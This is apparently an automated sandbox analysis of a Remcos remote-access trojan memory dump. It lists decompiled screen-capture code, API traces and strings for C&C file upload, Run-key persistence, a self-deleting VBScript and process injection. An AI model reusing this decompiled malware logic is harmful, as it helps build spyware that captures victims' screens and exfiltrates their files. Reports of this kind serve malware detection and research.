                                  • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 4026913539-546584676
                                  • Opcode ID: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                  • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                  • Opcode Fuzzy Hash: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                  • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
                                  				struct HDC__* _v8;
                                  				void* _v12;
                                  				struct HDC__* _v16;
                                  				int _v20;
                                  				int _v24;
                                  				int _v28;
                                  				char _v44;
                                  				intOrPtr _v50;
                                  				void* _v52;
                                  				void* _v54;
                                  				intOrPtr _v58;
                                  				char _v60;
                                  				char _v76;
                                  				intOrPtr _v80;
                                  				struct tagCURSORINFO _v96;
                                  				signed int _v102;
                                  				signed int _v104;
                                  				long _v112;
                                  				long _v116;
                                  				char _v120;
                                  				struct _ICONINFO _v140;
                                  				int _t143;
                                  				void* _t144;
                                  				signed int _t153;
                                  				long _t164;
                                  				void* _t165;
                                  				char* _t189;
                                  				signed int _t193;
                                  				void* _t214;
                                  				signed int _t222;
                                  				signed char _t224;
                                  				signed int _t225;
                                  				signed int _t242;
                                  				struct HDC__* _t245;
                                  				int _t249;
                                  				struct tagBITMAPINFO* _t250;
                                  
                                  				_t214 = 0;
                                  				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
                                  				_v16 = _t245;
                                  				_v8 = CreateCompatibleDC(_t245);
                                  				_t248 = 0x41bfc8 + _a12 * 4;
                                  				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
                                  				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
                                  				_v28 = _t143;
                                  				if(_v12 != 0 || _t143 != 0) {
                                  					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
                                  					_a12 = _t144;
                                  					if(_t144 != _t214) {
                                  						if(SelectObject(_v8, _t144) != 0) {
                                  							_v24 = _t214;
                                  							asm("stosd");
                                  							E0040FF57( *_t248,  &_v24);
                                  							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
                                  								if(_a8 != 0) {
                                  									_v96.cbSize = 0x14;
                                  									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
                                  										DeleteObject(_v140.hbmColor);
                                  										DeleteObject(_v140.hbmMask);
                                  										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
                                  										_t214 = 0;
                                  									}
                                  								}
                                  								_push( &_v120);
                                  								_t249 = 0x18;
                                  								if(GetObjectA(_a12, _t249, ??) != 0) {
                                  									_t153 = _v102 * _v104;
                                  									_t242 = 1;
                                  									if(_t153 != _t242) {
                                  										_t222 = 4;
                                  										if(_t153 > _t222) {
                                  											_t222 = 8;
                                  											if(_t153 <= _t222) {
                                  												goto L18;
                                  											}
                                  											_t222 = 0x10;
                                  											if(_t153 <= _t222) {
                                  												goto L18;
                                  											}
                                  											if(_t153 > _t249) {
                                  												_a8 = 0x20;
                                  												L28:
                                  												_push(0x28 + (_t242 << _a8) * 4);
                                  												L23:
                                  												_t250 = LocalAlloc(0x40, ??);
                                  												_t224 = _a8;
                                  												_t250->bmiHeader = 0x28;
                                  												_t250->bmiHeader.biWidth = _v116;
                                  												_t250->bmiHeader.biHeight = _v112;
                                  												_t250->bmiHeader.biPlanes = _v104;
                                  												_t250->bmiHeader.biBitCount = _v102;
                                  												if(_t224 < 0x18) {
                                  													_t193 = 1;
                                  													_t250->bmiHeader.biClrUsed = _t193 << _t224;
                                  												}
                                  												_t225 = 8;
                                  												asm("cdq");
                                  												_t250->bmiHeader.biCompression = _t214;
                                  												_t250->bmiHeader.biClrImportant = _t214;
                                  												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
                                  												_t250->bmiHeader.biSizeImage = _t164;
                                  												_t165 = GlobalAlloc(_t214, _t164);
                                  												_v12 = _t165;
                                  												if(_t165 != _t214) {
                                  													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
                                  														_v60 = 0x4d42;
                                  														_v54 = _t214;
                                  														_v52 = _t214;
                                  														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
                                  														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														DeleteObject(_a12);
                                  														GlobalFree(_v12);
                                  														DeleteDC(_v16);
                                  														DeleteDC(_v8);
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
                                  														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  														goto L33;
                                  													}
                                  													DeleteDC(_v16);
                                  													DeleteDC(_v8);
                                  													DeleteObject(_a12);
                                  													GlobalFree(_v12);
                                  													_t189 =  &_a11;
                                  												} else {
                                  													DeleteDC(_v16);
                                  													DeleteDC(_v8);
                                  													DeleteObject(_a12);
                                  													_t189 =  &_a11;
                                  												}
                                  												goto L31;
                                  											}
                                  											_a8 = _t249;
                                  											_push(0x28);
                                  											goto L23;
                                  										}
                                  										L18:
                                  										_a8 = _t222;
                                  										goto L28;
                                  									}
                                  									_a8 = _t242;
                                  									goto L28;
                                  								} else {
                                  									DeleteDC(_v16);
                                  									DeleteDC(_v8);
                                  									DeleteObject(_a12);
                                  									_t189 =  &_a11;
                                  									goto L31;
                                  								}
                                  							}
                                  							DeleteDC(_v16);
                                  							DeleteDC(_v8);
                                  							DeleteObject(_a12);
                                  							_t189 =  &_a11;
                                  							goto L31;
                                  						}
                                  						DeleteDC(_t245);
                                  						DeleteDC(_v8);
                                  						DeleteObject(_a12);
                                  						_t189 =  &_a11;
                                  						goto L31;
                                  					}
                                  					DeleteDC(_t245);
                                  					DeleteDC(_v8);
                                  					DeleteObject(_t214);
                                  					_t189 =  &_a11;
                                  					goto L31;
                                  				} else {
                                  					_t189 =  &_a11;
                                  					L31:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
                                  					L33:
                                  					return _a4;
                                  				}
                                  			}

                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                  • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                  • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                  • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                  • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                  • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                  • GlobalFree.KERNEL32 ref: 0040FDCA
                                  • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                  • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@Compatible$BitmapFreeGlobalSelect
                                  • String ID: $BM$DISPLAY
                                  • API String ID: 1151051811-871886180
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                  • String ID: Uploading file to C&C: $[INFO]
                                  • API String ID: 368904453-3151135581
                                  • Opcode ID: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                  • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                  • Opcode Fuzzy Hash: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                  • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                  • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1820998543-3714951968
                                  • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                  • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                  • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                  • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                  • wcslen.MSVCRT ref: 00409C25
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                  • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                  • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                  • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                  • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                  • API String ID: 2459104678-694575909
                                  • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                  • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                    • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • exit.MSVCRT ref: 0040A97F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                  • exit.MSVCRT ref: 0040A9A9
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                  • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                  • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                  • exit.MSVCRT ref: 0040AB2A
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
